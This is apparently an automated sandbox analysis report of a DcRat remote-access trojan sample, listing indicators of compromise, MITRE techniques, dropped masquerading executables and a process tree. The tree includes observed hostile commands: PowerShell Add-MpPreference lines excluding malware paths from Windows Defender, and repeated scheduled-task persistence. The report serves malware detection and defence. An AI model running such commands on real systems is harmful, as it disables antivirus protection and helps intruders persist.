dcrat | 5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
22/12/2024, 04:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9.exe
Size

1.3MB
MD5

da9a50af1a428fa3e2a29422fcf73fb7
SHA1

ca9adac746336c6327791b75301e99826a0d2d91
SHA256

5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9
SHA512

f73e27228fc32bee5fb6601926f12375edb299bb4685c53e5327b818482e6cf4bf5b4e72902246baaac1a036ded6fbf7be8018783b238a4b0d8c1e31e3d91a36
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 45 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2672	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2644	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2704	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	556	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1008	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1296	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2868	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2264	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3048	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	580	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2696	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3068	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3020	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3024	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1208	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1996	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1340	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1768	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1668	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2416	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1700	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2504	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1776	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1092	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1872	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1396	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1032	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	560	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1556	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1000	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2088	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	928	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1780	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	900	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1796	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1636	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2532	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	592	2744	schtasks.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	628	2744	schtasks.exe	34

DCRat payload 9 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x0008000000016ce8-9.dat	dcrat
behavioral1/memory/2736-13-0x0000000001380000-0x0000000001490000-memory.dmp	dcrat
behavioral1/memory/1780-136-0x00000000012B0000-0x00000000013C0000-memory.dmp	dcrat
behavioral1/memory/2984-256-0x00000000000F0000-0x0000000000200000-memory.dmp	dcrat
behavioral1/memory/1036-316-0x0000000000230000-0x0000000000340000-memory.dmp	dcrat
behavioral1/memory/2732-376-0x0000000001280000-0x0000000001390000-memory.dmp	dcrat
behavioral1/memory/1580-436-0x00000000003E0000-0x00000000004F0000-memory.dmp	dcrat
behavioral1/memory/2140-497-0x0000000000F50000-0x0000000001060000-memory.dmp	dcrat
behavioral1/memory/2328-557-0x0000000000FA0000-0x00000000010B0000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1992	powershell.exe
812	powershell.exe
2484	powershell.exe
1580	powershell.exe
1060	powershell.exe
1264	powershell.exe
1784	powershell.exe
2324	powershell.exe
2340	powershell.exe
2500	powershell.exe
2448	powershell.exe
1604	powershell.exe
1512	powershell.exe
2104	powershell.exe
2188	powershell.exe
288	powershell.exe

Executes dropped EXE 10 IoCs

pid	Process
2736	DllCommonsvc.exe
1780	dllhost.exe
1448	dllhost.exe
2984	dllhost.exe
1036	dllhost.exe
2732	dllhost.exe
1580	dllhost.exe
2140	dllhost.exe
2328	dllhost.exe
2840	dllhost.exe

Loads dropped DLL 2 IoCs

pid	Process
2452	cmd.exe
2452	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
12	raw.githubusercontent.com
16	raw.githubusercontent.com
4	raw.githubusercontent.com
9	raw.githubusercontent.com
22	raw.githubusercontent.com
25	raw.githubusercontent.com
29	raw.githubusercontent.com
5	raw.githubusercontent.com
19	raw.githubusercontent.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\sv-SE\explorer.exe	DllCommonsvc.exe
File created	C:\Windows\SysWOW64\sv-SE\7a0fd90576e088	DllCommonsvc.exe

Drops file in Program Files directory 19 IoCs

description	ioc	Process
File created	C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Journal\fr-FR\56085415360792	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\it-IT\WmiPrvSE.exe	DllCommonsvc.exe
File created	C:\Program Files\Internet Explorer\de-DE\explorer.exe	DllCommonsvc.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\lsass.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\es-ES\5940a34987c991	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Mail\fr-FR\System.exe	DllCommonsvc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\winlogon.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Mail\fr-FR\27d1bcfc3c54e0	DllCommonsvc.exe
File created	C:\Program Files\Windows Journal\fr-FR\wininit.exe	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\it-IT\24dbde2999530e	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\es-ES\dllhost.exe	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\lsm.exe	DllCommonsvc.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\control\5940a34987c991	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\101b941d020240	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\cc11b995f2a76d	DllCommonsvc.exe
File created	C:\Program Files\Internet Explorer\de-DE\7a0fd90576e088	DllCommonsvc.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\6203df4a6bafc7	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\winlogon.exe	DllCommonsvc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\de-DE\7a0fd90576e088	DllCommonsvc.exe
File created	C:\Windows\system\wininit.exe	DllCommonsvc.exe
File created	C:\Windows\system\56085415360792	DllCommonsvc.exe
File created	C:\Windows\de-DE\explorer.exe	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 45 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2704	schtasks.exe
556	schtasks.exe
900	schtasks.exe
2532	schtasks.exe
1340	schtasks.exe
2416	schtasks.exe
2368	schtasks.exe
1008	schtasks.exe
1296	schtasks.exe
2868	schtasks.exe
3024	schtasks.exe
1996	schtasks.exe
1556	schtasks.exe
2088	schtasks.exe
1796	schtasks.exe
1208	schtasks.exe
1768	schtasks.exe
2424	schtasks.exe
2504	schtasks.exe
1396	schtasks.exe
1636	schtasks.exe
2296	schtasks.exe
3048	schtasks.exe
1872	schtasks.exe
3036	schtasks.exe
2644	schtasks.exe
2696	schtasks.exe
1700	schtasks.exe
1092	schtasks.exe
1000	schtasks.exe
928	schtasks.exe
2764	schtasks.exe
2672	schtasks.exe
3068	schtasks.exe
1668	schtasks.exe
1776	schtasks.exe
1780	schtasks.exe
592	schtasks.exe
560	schtasks.exe
628	schtasks.exe
2264	schtasks.exe
580	schtasks.exe
2716	schtasks.exe
3020	schtasks.exe
1032	schtasks.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
2736	DllCommonsvc.exe
2736	DllCommonsvc.exe
2736	DllCommonsvc.exe
1784	powershell.exe
1060	powershell.exe
1512	powershell.exe
2484	powershell.exe
2340	powershell.exe
288	powershell.exe
1992	powershell.exe
2448	powershell.exe
2188	powershell.exe
812	powershell.exe
1604	powershell.exe
2104	powershell.exe
2500	powershell.exe
1264	powershell.exe
1580	powershell.exe
2324	powershell.exe
1780	dllhost.exe
1448	dllhost.exe
2984	dllhost.exe
1036	dllhost.exe
2732	dllhost.exe
1580	dllhost.exe
2140	dllhost.exe
2328	dllhost.exe
2840	dllhost.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	DllCommonsvc.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	2340	powershell.exe
Token: SeDebugPrivilege	288	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	1780	dllhost.exe
Token: SeDebugPrivilege	1448	dllhost.exe
Token: SeDebugPrivilege	2984	dllhost.exe
Token: SeDebugPrivilege	1036	dllhost.exe
Token: SeDebugPrivilege	2732	dllhost.exe
Token: SeDebugPrivilege	1580	dllhost.exe
Token: SeDebugPrivilege	2140	dllhost.exe
Token: SeDebugPrivilege	2328	dllhost.exe
Token: SeDebugPrivilege	2840	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1820 wrote to memory of 2116	1820	JaffaCakes118_5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9.exe	30
PID 1820 wrote to memory of 2116	1820	JaffaCakes118_5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9.exe	30
PID 1820 wrote to memory of 2116	1820	JaffaCakes118_5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9.exe	30
PID 1820 wrote to memory of 2116	1820	JaffaCakes118_5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9.exe	30
PID 2116 wrote to memory of 2452	2116	WScript.exe	31
PID 2116 wrote to memory of 2452	2116	WScript.exe	31
PID 2116 wrote to memory of 2452	2116	WScript.exe	31
PID 2116 wrote to memory of 2452	2116	WScript.exe	31
PID 2452 wrote to memory of 2736	2452	cmd.exe	33
PID 2452 wrote to memory of 2736	2452	cmd.exe	33
PID 2452 wrote to memory of 2736	2452	cmd.exe	33
PID 2452 wrote to memory of 2736	2452	cmd.exe	33
PID 2736 wrote to memory of 1784	2736	DllCommonsvc.exe	80
PID 2736 wrote to memory of 1784	2736	DllCommonsvc.exe	80
PID 2736 wrote to memory of 1784	2736	DllCommonsvc.exe	80
PID 2736 wrote to memory of 1060	2736	DllCommonsvc.exe	81
PID 2736 wrote to memory of 1060	2736	DllCommonsvc.exe	81
PID 2736 wrote to memory of 1060	2736	DllCommonsvc.exe	81
PID 2736 wrote to memory of 1264	2736	DllCommonsvc.exe	82
PID 2736 wrote to memory of 1264	2736	DllCommonsvc.exe	82
PID 2736 wrote to memory of 1264	2736	DllCommonsvc.exe	82
PID 2736 wrote to memory of 1992	2736	DllCommonsvc.exe	83
PID 2736 wrote to memory of 1992	2736	DllCommonsvc.exe	83
PID 2736 wrote to memory of 1992	2736	DllCommonsvc.exe	83
PID 2736 wrote to memory of 1512	2736	DllCommonsvc.exe	84
PID 2736 wrote to memory of 1512	2736	DllCommonsvc.exe	84
PID 2736 wrote to memory of 1512	2736	DllCommonsvc.exe	84
PID 2736 wrote to memory of 812	2736	DllCommonsvc.exe	85
PID 2736 wrote to memory of 812	2736	DllCommonsvc.exe	85
PID 2736 wrote to memory of 812	2736	DllCommonsvc.exe	85
PID 2736 wrote to memory of 2324	2736	DllCommonsvc.exe	86
PID 2736 wrote to memory of 2324	2736	DllCommonsvc.exe	86
PID 2736 wrote to memory of 2324	2736	DllCommonsvc.exe	86
PID 2736 wrote to memory of 2340	2736	DllCommonsvc.exe	87
PID 2736 wrote to memory of 2340	2736	DllCommonsvc.exe	87
PID 2736 wrote to memory of 2340	2736	DllCommonsvc.exe	87
PID 2736 wrote to memory of 2484	2736	DllCommonsvc.exe	88
PID 2736 wrote to memory of 2484	2736	DllCommonsvc.exe	88
PID 2736 wrote to memory of 2484	2736	DllCommonsvc.exe	88
PID 2736 wrote to memory of 2104	2736	DllCommonsvc.exe	89
PID 2736 wrote to memory of 2104	2736	DllCommonsvc.exe	89
PID 2736 wrote to memory of 2104	2736	DllCommonsvc.exe	89
PID 2736 wrote to memory of 1580	2736	DllCommonsvc.exe	90
PID 2736 wrote to memory of 1580	2736	DllCommonsvc.exe	90
PID 2736 wrote to memory of 1580	2736	DllCommonsvc.exe	90
PID 2736 wrote to memory of 1604	2736	DllCommonsvc.exe	92
PID 2736 wrote to memory of 1604	2736	DllCommonsvc.exe	92
PID 2736 wrote to memory of 1604	2736	DllCommonsvc.exe	92
PID 2736 wrote to memory of 288	2736	DllCommonsvc.exe	93
PID 2736 wrote to memory of 288	2736	DllCommonsvc.exe	93
PID 2736 wrote to memory of 288	2736	DllCommonsvc.exe	93
PID 2736 wrote to memory of 2500	2736	DllCommonsvc.exe	94
PID 2736 wrote to memory of 2500	2736	DllCommonsvc.exe	94
PID 2736 wrote to memory of 2500	2736	DllCommonsvc.exe	94
PID 2736 wrote to memory of 2188	2736	DllCommonsvc.exe	95
PID 2736 wrote to memory of 2188	2736	DllCommonsvc.exe	95
PID 2736 wrote to memory of 2188	2736	DllCommonsvc.exe	95
PID 2736 wrote to memory of 2448	2736	DllCommonsvc.exe	96
PID 2736 wrote to memory of 2448	2736	DllCommonsvc.exe	96
PID 2736 wrote to memory of 2448	2736	DllCommonsvc.exe	96
PID 2736 wrote to memory of 2648	2736	DllCommonsvc.exe	112
PID 2736 wrote to memory of 2648	2736	DllCommonsvc.exe	112
PID 2736 wrote to memory of 2648	2736	DllCommonsvc.exe	112
PID 2648 wrote to memory of 1748	2648	cmd.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5250c5d8b9850d6a659642eef478c6058cba54903f674b3370e8f0d9df55d4c9.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1820
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2452
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Visual Studio 8\winlogon.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\dwm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1264
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\lsm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\sv-SE\explorer.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:812
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\sppsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\fr-FR\wininit.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2340
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Games\SpiderSolitaire\it-IT\WmiPrvSE.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\explorer.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\de-DE\explorer.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1580
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jdk1.7.0_80\bin\lsass.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\system\wininit.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\es-ES\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\fr-FR\System.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2448
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9VddvjHMjC.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2648
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:1748
      - C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe
        
        "C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9Z120WfzwF.bat"
        7⤵
        
        PID:780
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:2332
        
        C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe
        
        "C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1448
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat"
        9⤵
        
        PID:2132
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:1764
        
        C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe
        
        "C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2984
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat"
        11⤵
        
        PID:2344
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:3036
        
        C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe
        
        "C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe"
        12⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1036
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat"
        13⤵
        
        PID:2544
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:1780
        
        C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe
        
        "C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe"
        14⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2732
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6uMgbjYtd5.bat"
        15⤵
        
        PID:1028
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:1720
        
        C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe
        
        "C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe"
        16⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1580
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AWL6wsGpK7.bat"
        17⤵
        
        PID:3036
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        18⤵
        
        PID:1672
        
        C:\Program Files\VideoLAN\VLC\plugins\control\dllhost.exe
